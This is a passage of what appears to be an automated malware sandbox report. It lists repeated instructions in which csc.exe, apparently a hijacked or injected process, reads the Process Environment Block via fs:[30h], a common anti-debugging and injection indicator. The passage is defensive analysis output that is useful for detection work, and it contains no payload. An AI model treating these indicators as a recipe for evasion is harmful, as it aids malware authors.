            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05750535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0576E53E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057D6500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05814500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0576E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057425E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0577C5ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057465D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0577A5D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0577E5CF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057645B1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057C05A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0577E59C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05742582 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05742582 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05774588 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0576A470 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057CC460 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0576245A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0573645D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0577E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0573E420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0573C427 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057C6420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05778402 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057404E5 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057744B0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057CA4B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057464AB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05748770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05750770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057CE75D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05740750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057C4755 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0577674D mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0577674D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0577273C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0577273C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057BC730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0577C720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05740710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05770710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0577C700 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057447FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057627ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057CE7E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0574C7C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057C07C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057407AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05772674 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0577A660 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0575C640 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0575E627 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05776620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05778620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0574262C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782619 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057BE609 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0575260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057BE6F2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057C06F1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0577A6C7 mov ebx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0577A6C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057766B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0577C6A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05744690 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0580866E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05746154 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0573C156 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057D8158 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057D4144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057D4144 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_058061C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05770124 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_058161E5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057EA118 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057EA118 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057701F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05800115 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057BE1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057BE1D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057C019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0573A197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057FC188 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05780185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0576C073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05742050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057C6050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_058060B8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_058060B8 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057D6030 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0573A020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0573C020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0575E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057C4000 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057E2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0573C0F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057820F0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0573A0E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057C60E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057480E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057C20DE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057D80A8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0574208A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057E437C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057C035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057C035C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057C2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C2349 mov eax, dword ptr fs:[00000030h]4_2_057C2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C2349 mov eax, dword ptr fs:[00000030h]4_2_057C2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C2349 mov eax, dword ptr fs:[00000030h]4_2_057C2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C2349 mov eax, dword ptr fs:[00000030h]4_2_057C2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C2349 mov eax, dword ptr fs:[00000030h]4_2_057C2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C2349 mov eax, dword ptr fs:[00000030h]4_2_057C2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C2349 mov eax, dword ptr fs:[00000030h]4_2_057C2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C2349 mov eax, dword ptr fs:[00000030h]4_2_057C2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C2349 mov eax, dword ptr fs:[00000030h]4_2_057C2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C2349 mov eax, dword ptr fs:[00000030h]4_2_057C2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573C310 mov ecx, dword ptr fs:[00000030h]4_2_0573C310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05760310 mov ecx, dword ptr fs:[00000030h]4_2_05760310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577A30B mov eax, dword ptr fs:[00000030h]4_2_0577A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577A30B mov eax, dword ptr fs:[00000030h]4_2_0577A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577A30B mov eax, dword ptr fs:[00000030h]4_2_0577A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575E3F0 mov eax, dword ptr fs:[00000030h]4_2_0575E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575E3F0 mov eax, dword ptr fs:[00000030h]4_2_0575E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575E3F0 mov eax, dword ptr fs:[00000030h]4_2_0575E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057763FF mov eax, dword ptr fs:[00000030h]4_2_057763FF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057503E9 mov eax, dword ptr fs:[00000030h]4_2_057503E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057503E9 mov eax, dword ptr fs:[00000030h]4_2_057503E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057503E9 mov eax, dword ptr fs:[00000030h]4_2_057503E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057503E9 mov eax, dword ptr fs:[00000030h]4_2_057503E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057503E9 mov eax, dword ptr fs:[00000030h]4_2_057503E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057503E9 mov eax, dword ptr fs:[00000030h]4_2_057503E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057503E9 mov eax, dword ptr fs:[00000030h]4_2_057503E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057503E9 mov eax, dword ptr fs:[00000030h]4_2_057503E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E43D4 mov eax, dword ptr fs:[00000030h]4_2_057E43D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E43D4 mov eax, dword ptr fs:[00000030h]4_2_057E43D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057FC3CD mov eax, dword ptr fs:[00000030h]4_2_057FC3CD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574A3C0 mov eax, dword ptr fs:[00000030h]4_2_0574A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574A3C0 mov eax, dword ptr fs:[00000030h]4_2_0574A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574A3C0 mov eax, dword ptr fs:[00000030h]4_2_0574A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574A3C0 mov eax, dword ptr fs:[00000030h]4_2_0574A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574A3C0 mov eax, dword ptr fs:[00000030h]4_2_0574A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574A3C0 mov eax, dword ptr fs:[00000030h]4_2_0574A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057483C0 mov eax, dword ptr fs:[00000030h]4_2_057483C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057483C0 mov eax, dword ptr fs:[00000030h]4_2_057483C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057483C0 mov eax, dword ptr fs:[00000030h]4_2_057483C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057483C0 mov eax, dword ptr fs:[00000030h]4_2_057483C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C63C0 mov eax, dword ptr fs:[00000030h]4_2_057C63C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0580A352 mov eax, dword ptr fs:[00000030h]4_2_0580A352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05738397 mov eax, dword ptr fs:[00000030h]4_2_05738397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05738397 mov eax, dword ptr fs:[00000030h]4_2_05738397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05738397 mov eax, dword ptr fs:[00000030h]4_2_05738397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576438F mov eax, dword ptr fs:[00000030h]4_2_0576438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576438F mov eax, dword ptr fs:[00000030h]4_2_0576438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573E388 mov eax, dword ptr fs:[00000030h]4_2_0573E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573E388 mov eax, dword ptr fs:[00000030h]4_2_0573E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573E388 mov eax, dword ptr fs:[00000030h]4_2_0573E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0274 mov eax, dword ptr fs:[00000030h]4_2_057F0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0274 mov eax, dword ptr fs:[00000030h]4_2_057F0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0274 mov eax, dword ptr fs:[00000030h]4_2_057F0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0274 mov eax, dword ptr fs:[00000030h]4_2_057F0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0274 mov eax, dword ptr fs:[00000030h]4_2_057F0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0274 mov eax, dword ptr fs:[00000030h]4_2_057F0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0274 mov eax, dword ptr fs:[00000030h]4_2_057F0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0274 mov eax, dword ptr fs:[00000030h]4_2_057F0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0274 mov eax, dword ptr fs:[00000030h]4_2_057F0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0274 mov eax, dword ptr fs:[00000030h]4_2_057F0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0274 mov eax, dword ptr fs:[00000030h]4_2_057F0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0274 mov eax, dword ptr fs:[00000030h]4_2_057F0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05744260 mov eax, dword ptr fs:[00000030h]4_2_05744260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05744260 mov eax, dword ptr fs:[00000030h]4_2_05744260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05744260 mov eax, dword ptr fs:[00000030h]4_2_05744260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573826B mov eax, dword ptr fs:[00000030h]4_2_0573826B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573A250 mov eax, dword ptr fs:[00000030h]4_2_0573A250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05746259 mov eax, dword ptr fs:[00000030h]4_2_05746259
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C8243 mov eax, dword ptr fs:[00000030h]4_2_057C8243
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C8243 mov ecx, dword ptr fs:[00000030h]4_2_057C8243
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573823B mov eax, dword ptr fs:[00000030h]4_2_0573823B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057502E1 mov eax, dword ptr fs:[00000030h]4_2_057502E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057502E1 mov eax, dword ptr fs:[00000030h]4_2_057502E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057502E1 mov eax, dword ptr fs:[00000030h]4_2_057502E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574A2C3 mov eax, dword ptr fs:[00000030h]4_2_0574A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574A2C3 mov eax, dword ptr fs:[00000030h]4_2_0574A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574A2C3 mov eax, dword ptr fs:[00000030h]4_2_0574A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574A2C3 mov eax, dword ptr fs:[00000030h]4_2_0574A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574A2C3 mov eax, dword ptr fs:[00000030h]4_2_0574A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057502A0 mov eax, dword ptr fs:[00000030h]4_2_057502A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057502A0 mov eax, dword ptr fs:[00000030h]4_2_057502A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D62A0 mov eax, dword ptr fs:[00000030h]4_2_057D62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D62A0 mov ecx, dword ptr fs:[00000030h]4_2_057D62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D62A0 mov eax, dword ptr fs:[00000030h]4_2_057D62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D62A0 mov eax, dword ptr fs:[00000030h]4_2_057D62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D62A0 mov eax, dword ptr fs:[00000030h]4_2_057D62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D62A0 mov eax, dword ptr fs:[00000030h]4_2_057D62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577E284 mov eax, dword ptr fs:[00000030h]4_2_0577E284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577E284 mov eax, dword ptr fs:[00000030h]4_2_0577E284
